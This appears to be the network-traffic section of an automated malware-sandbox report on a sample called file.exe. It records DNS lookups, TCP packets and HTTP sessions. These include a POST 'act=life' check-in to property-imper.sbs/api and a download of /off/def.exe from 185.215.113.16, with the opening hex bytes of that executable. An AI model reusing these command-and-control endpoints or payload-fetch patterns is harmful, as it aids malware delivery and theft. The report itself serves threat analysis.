                                                                                                                                                                                  Nov 23, 2024 14:48:15.428910017 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:15.428975105 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:15.428977013 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:15.429018021 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:15.429111958 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:15.429119110 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:15.429128885 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:15.429191113 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:15.429223061 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:15.431528091 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:15.431595087 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:15.431624889 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:15.431731939 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:15.431782961 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:15.432861090 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:15.432861090 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:15.432888031 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:15.432914019 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:15.435002089 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:15.435009956 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:15.435060978 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:15.435199022 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:15.435209990 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:16.102816105 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:16.103408098 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:16.103435993 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:16.103894949 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:16.103902102 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:16.543714046 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:16.547039032 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:16.547103882 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:16.547149897 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:16.547172070 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:16.547182083 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:16.547188997 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:16.549704075 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:16.549772024 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:16.549834013 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:16.550225019 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:16.550245047 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.209080935 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.209769011 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.209824085 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.210313082 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.210325003 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.221020937 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.221642971 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.221683979 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.221710920 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.222083092 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.222086906 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.222114086 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.222124100 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.222655058 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.222657919 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.273922920 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.274710894 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.274795055 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.275217056 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.275234938 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.661252975 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.663537979 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.663609982 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.664664984 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.664726973 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.664782047 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.664805889 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.664824009 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.664832115 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667146921 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667221069 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667260885 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667273998 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667283058 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667288065 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667682886 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667756081 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667764902 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667802095 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667804956 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667805910 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667815924 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667819977 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.667918921 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.668370962 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.668380976 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.670042992 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.670121908 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.670209885 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.670279026 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.670290947 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.670319080 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.670353889 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.670361042 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.670492887 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.670505047 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.729063034 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.732203960 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.732253075 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.732255936 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.732297897 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.732364893 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.732383966 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.732398033 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.732404947 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.735109091 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.735155106 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:17.735480070 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.735656023 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:17.735686064 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:18.271791935 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:18.272399902 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:18.272434950 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:48:18.272939920 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:48:18.272953033 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Nov 23, 2024 14:46:10.513603926 CET5057753192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 23, 2024 14:46:10.775245905 CET53505771.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:22.469516993 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                  Nov 23, 2024 14:46:48.765983105 CET53618961.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:48.782079935 CET53542361.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:51.880244017 CET53563681.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:52.791424990 CET5768753192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 23, 2024 14:46:52.791565895 CET5858253192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 23, 2024 14:46:52.928520918 CET53576871.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:52.930021048 CET53585821.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.496849060 CET5276753192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 23, 2024 14:46:55.497016907 CET5855753192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 23, 2024 14:47:03.449539900 CET53595201.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:05.717364073 CET6384653192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 23, 2024 14:47:05.717520952 CET6238253192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 23, 2024 14:47:08.941082954 CET53653841.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.754573107 CET53572591.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:48.228883028 CET53557051.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:50.819556952 CET53624591.1.1.1192.168.2.4
                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                  Nov 23, 2024 14:47:06.113532066 CET192.168.2.41.1.1.1c275(Port unreachable)Destination Unreachable
                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Nov 23, 2024 14:46:10.513603926 CET192.168.2.41.1.1.10xb2f2Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:52.791424990 CET192.168.2.41.1.1.10x46e8Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:52.791565895 CET192.168.2.41.1.1.10x925fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:55.496849060 CET192.168.2.41.1.1.10xac42Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:55.497016907 CET192.168.2.41.1.1.10xd45Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:47:05.717364073 CET192.168.2.41.1.1.10xc60fStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:47:05.717520952 CET192.168.2.41.1.1.10x1072Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Nov 23, 2024 14:46:10.775245905 CET1.1.1.1192.168.2.40xb2f2No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:10.775245905 CET1.1.1.1192.168.2.40xb2f2No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:52.928520918 CET1.1.1.1192.168.2.40x46e8No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:52.930021048 CET1.1.1.1192.168.2.40x925fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:55.636708975 CET1.1.1.1192.168.2.40xac42No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:55.636708975 CET1.1.1.1192.168.2.40xac42No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:55.636708975 CET1.1.1.1192.168.2.40xac42No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:55.636708975 CET1.1.1.1192.168.2.40xac42No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:55.636734962 CET1.1.1.1192.168.2.40xd45No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:55.636734962 CET1.1.1.1192.168.2.40xd45No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:55.817574978 CET1.1.1.1192.168.2.40xed08No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:55.929807901 CET1.1.1.1192.168.2.40xa4bcNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:55.929807901 CET1.1.1.1192.168.2.40xa4bcNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:55.929807901 CET1.1.1.1192.168.2.40xa4bcNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:58.566066980 CET1.1.1.1192.168.2.40x5be7No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:58.566307068 CET1.1.1.1192.168.2.40x5c60No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:58.566307068 CET1.1.1.1192.168.2.40x5c60No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:46:58.566307068 CET1.1.1.1192.168.2.40x5c60No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:47:05.942787886 CET1.1.1.1192.168.2.40xc60fNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 14:47:06.113425970 CET1.1.1.1192.168.2.40x1072No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  • property-imper.sbs
                                                                                                                                                                                  • slscr.update.microsoft.com
                                                                                                                                                                                  • fs.microsoft.com
                                                                                                                                                                                  • https:
                                                                                                                                                                                    • js.monitor.azure.com
                                                                                                                                                                                    • wcpstatic.microsoft.com
                                                                                                                                                                                  • otelrules.azureedge.net
                                                                                                                                                                                  • 185.215.113.16
                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.449744185.215.113.16807280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Nov 23, 2024 14:46:37.176249027 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.512197971 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:38 GMT
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Content-Length: 2805248
                                                                                                                                                                                  Last-Modified: Sat, 23 Nov 2024 13:20:21 GMT
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  ETag: "6741d695-2ace00"
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 56 38 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                  Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$@+ `@ +V8+`Ui` @ @.rsrc`2@.idata 8@idwitinv*l*:@mjfbzujg +*@.taggant@@+"*@
                                                                                                                                                                                  Nov 23, 2024 14:46:38.512236118 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 14:46:38.512775898 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 14:46:38.512805939 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 14:46:38.512815952 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 14:46:38.513473034 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 14:46:38.513495922 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 14:46:38.513504982 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 14:46:38.515043020 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 14:46:38.515295982 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 14:46:38.632045984 CET1236INData Raw: 03 83 06 1c 07 41 ca ce bd 61 c0 27 5e 52 f8 02 65 31 e6 f6 7a a6 1c 18 e5 6c bd f5 4b 7c 51 2f 58 b7 df eb fa 57 fc 4f af 5d 85 09 9f 6a fc fc 7a b1 d3 f7 6c de ca e0 93 a1 a9 6a 56 43 53 e2 63 b0 f0 bb bc a1 a4 4a f6 54 1a 6a 56 43 53 50 63 4c
                                                                                                                                                                                  Data Ascii: Aa'^Re1zlK|Q/XWO]jzljVCScJTjVCSPcLkq4[VdH=m^:OyAyAWRjFwvsNc#!qWdts^?,F2}O]e!xKzJyU+7wKW5>MkG


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.449730172.67.162.844437280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:12 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 13:46:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                  2024-11-23 13:46:12 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:12 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=u30c7ffo6muirs4v751dnhgvcg; expires=Wed, 19-Mar-2025 07:32:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6bzybW1R2bJTEpLiLPEBsblxArP3320lsIvnYfdzx5e7JsaXfI8tXUxrgZgyJrag1L2JQ%2B%2BZdzDZcHhNlNtYSMfpqHHHwX4D3QzA6F5sRzgHNXDu%2FsDl1ZF4KTxxYluoPlgJgIQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
